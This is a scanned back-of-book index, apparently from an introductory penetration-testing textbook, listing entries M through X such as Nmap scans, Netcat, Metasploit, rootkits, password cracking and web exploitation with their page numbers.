12022MS08-067, 73-74, 75, 76
12023MS09-001, 74, 75
12024Msfconsole, 72, 73
12025MS-SQL, 67
12026MySpace, 25
12027MySQL, 67, 117
12028
12029N
12030
12031Nessus, 58-61, 73, 146
12032
12033screenshot of, 59
12034
12035setting up, 60
12036
12037steps to install, 58-59
12038Netbus, 134-135, 144
12039Netcat, 128-133, 139, 142
12040
12041Cryptcat, 133-134
12042Netcraft, 31
12043NetWare NCP, 67
12044
12045Network interface card (NIC), 92-93
12046Network traffic, sniffing, 92-93
12047NIC. See Network interface card
12048
12049(NIC)
12050Nikto, 108-109
12051Nmap, 48, 73, 131, 146
12052
12053and null scans, 56-57
12054
12055and SYN scan, 51-52
12056
12057and TCP connect scan, 49-51
12058
12059and UDP scans, 52-55
12060
12061and Xmas scan, 55-56
12062NNTP, 67
12063NS Lookup, 34-35
12064"nslookup" command, 34
12065Null scans, using Nmap to perform,
1206656-57
12067
120680
12069
12070Offensive security, 3
12071
12072Online password crackers, 67
12073
12074Open Source Security Testing
12075
12076Methodology Manual
12077
12078(OSSTMM), 155
12079Open Web Application Security
12080
12081Project (OWASP)
12082
12083organization, 123, 125
12084OSSTMM. See Open Source Security
12085
12086Testing Methodology Manual
12087
12088(OSSTMM)
12089
12090
12091
12092OSX passwords, cracking, 88
12093OWASP Top Ten Project, 124
12094
12095P
12096
12097Paros Proxy, 125
12098
12099Passive reconnaissance, 18, 21
12100
12101Password dictionary, 68, 87
12102
12103Password hashes, 82, 83, 86
12104
12105Password resetting, 89-92
12106
12107"patch.exe", 135
12108
12109Paterva's Maltego CE, 40-41
12110
12111Payloads, 13, 71, 79
12112
12113reverse, 79
12114PC Anywhere, 67
12115Penetration testing, 1, 66, 145
12116advanced security concepts,
12117
12118152-153
12119Backtrack, working with, 6-9
12120Backtrack Linux, 3-6
12121books for, 154
12122circle of life, 156
12123definition of, 1
12124getting started, 2-3
12125guidelines, 153-155
12126hacking lab, use and creation of,
12127
121289-10
12129phases of, 10
12130
12131four-step model, 13-14
12132report writing, 146
12133detailed report, 147-149
12134executive summary, 147
12135raw output, 149-152
12136Penetration Testing Framework
12137
12138(PTF), 155
12139PGP server, 26
12140
12141Ping and ping sweeps, 46-48
12142POC attacks. See Proof of concept
12143
12144(POC) attacks
12145POP3, 67
12146
12147Port numbers, and corresponding
12148services, 45
12149
12150Port scanning, 13, 48
12151null scans and Nmap, 56-57
12152SYN scan and Nmap, 51-52
12153TCP connect scan and Nmap, 49-51
12154three-way handshake, 49, 57-58
12155UDP scans and Nmap, 52-55
12156Xmas scan and Nmap, 55-56
12157
12158Poweroff command, 8
12159
12160Proof of concept (POC) attacks, 1,
12161101, 148
12162
12163PTF. See Penetration Testing
12164Framework (PTF)
12165
12166Python script, 26, 37
12167
12168
12169
12170Index
12171
12172
12173
12174R
12175
12176RainbowCrack, 104
12177Rapid, 7, 71
12178Reboot command, 8
12179Reconnaissance, 10-11, 13, 15
12180
12181dig, 35-36
12182
12183DNS servers, 32-36
12184
12185e-mail server, extracting
12186information from, 36
12187MetaGooFil, 36-37
12188
12189finding attackable targets, 39
12190
12191Google directives, 22-26
12192
12193host command, 31-32
12194
12195Harvester, 26-28
12196
12197HTTrack, 19-22
12198
12199information gathering, advanced
12200topics in, 40-41
12201Google Hacking for Penetration
12202
12203Testers, 40
12204Johnny Long's Google Hacking
12205
12206Database (GHDB), 40
12207Paterva's Maltego CE, 40-41
12208Search Engine Assessment Tool
12209
12210(SEAT), 40
12211search engine directives for sites
12212other than Google, 40
12213Netcraft, 31
12214NS Lookup, 34-35
12215practicing, 39-40
12216social engineering, 38-39
12217Whois, 28-31
12218"Referral URL:", 30
12219Remote access service, 67-70
12220Report writing, 146
12221detailed report, 147-149
12222executive summary, 147
12223raw output, 149-152
12224Reverse payloads, 79, 80
12225REXEC, 67
12226RFC, 55
12227RLOGIN, 67
12228Rootkits, 128, 135
12229detecting and defending against,
12230
12231141-142
12232Hacker Defender, 137-141
12233practice, 143
12234
12235s
12236
12237Saint, 62
12238
12239SAM (Security Account Manager)
12240file, 83-84, 85
12241
12242
12243
12244Samdump2, 84-85, 86
12245SAM Juicer tool, 81, 83-84
12246Scanning, 43
12247pings and ping sweeps, 46-48
12248port scanning, 48
12249null scans and Nmap, 56-57
12250SYN scan and Nmap, 51-52
12251TCP connect scan and Nmap,
1225249-51
12253
12254three-way handshake, 49
12255UDP scans and Nmap, 52-55
12256wrap up, 57-58
12257Xmas scan and Nmap, 55-56
12258practicing, 61-62
12259steps in, 43-46
12260vulnerability scanning, 58-61
12261Search Engine Assessment Tool
12262
12263(SEAT), 40
12264Search engine directives, for sites
12265
12266other than Google, 40
12267SEAT. See Search Engine Assessment
12268
12269Tool (SEAT)
12270Security Account Manager file.
12271
12272See SAM (Security Account
12273Manager) file
12274Security-related curriculum, 154, 155
12275SELECT statement, 118
122767zip, 150
12277"Site Report", 31
12278SMTP-AUTH, 67
12279Sniffing, 92-93
12280SNMP, 67
12281
12282Social engineering, 38-39
12283
12284Spidering, 111-114
12285
12286SQL. See Structured Query Language
12287
12288(SQL)
12289SSH, 58, 67
12290SSHv2, 67
12291Star Wars, 1
12292"Stealth Scan", 51
12293Stored XSS, 123
12294
12295Structured Query Language (SQL),
12296
12297117, 118
12298SubSeven (Sub7), 144
12299Sullo, Chris, 108
12300Sun Microsystem, 5
12301"Swiss army knife". See Netcat
12302SYN/ACK packet, 49
12303Syngress.com, 29, 31, 32, 154
12304SYN scan, 51-52
12305System32 directory, 132-133
12306
12307
12308
12309T
12310
12311TCP (Transmission Control
12312
12313Protocol) Connect scan,
1231449-51, 53
12315
12316Telnet, 58, 67
12317
12318Three-way handshake, 49
12319
12320TrueCrypt, 150
12321
12322Twitter, 25-26
12323
12324u
12325
12326LIDP (User Datagram Protocol), 53
12327
12328and Nmap, 52-55
12329UseNet, 25
12330
12331V
12332
12333VirtualBox, 5
12334Virtual PC, 5
12335VMware image, 5
12336VMware Player, 5-6
12337VNC software, 67, 76
12338Vulnerability assessment and
12339
12340penetration testing, 1-2
12341Vulnerability scanner, 71
12342Vulnerability scanning, 13, 45,
12343
1234458-61
12345
12346w
12347
12348Web-based exploitation, 107
12349code injection attacks, 116-120
12350cross-site scripting, 121-123
12351interrogating web servers, 108-109
12352spidering, 111-114
12353WebScarab, 112, 113, 115-116
12354Websecurify, 110-111
12355
12356Web Form, 67
12357
12358WebGoat, 123-124
12359
12360WebScarab, 111-113, 115-116
12361
12362Websecurify, 110-111
12363
12364Whois, 28-31
12365
12366Wilhelm, Thomas, 102
12367
12368Windows version, 46
12369
12370Wireshark, 94-96, 97, 104
12371
12372X
12373
12374Xmas scan and Nmap, 55-56
12375XSS. See Cross-site scripting (XSS)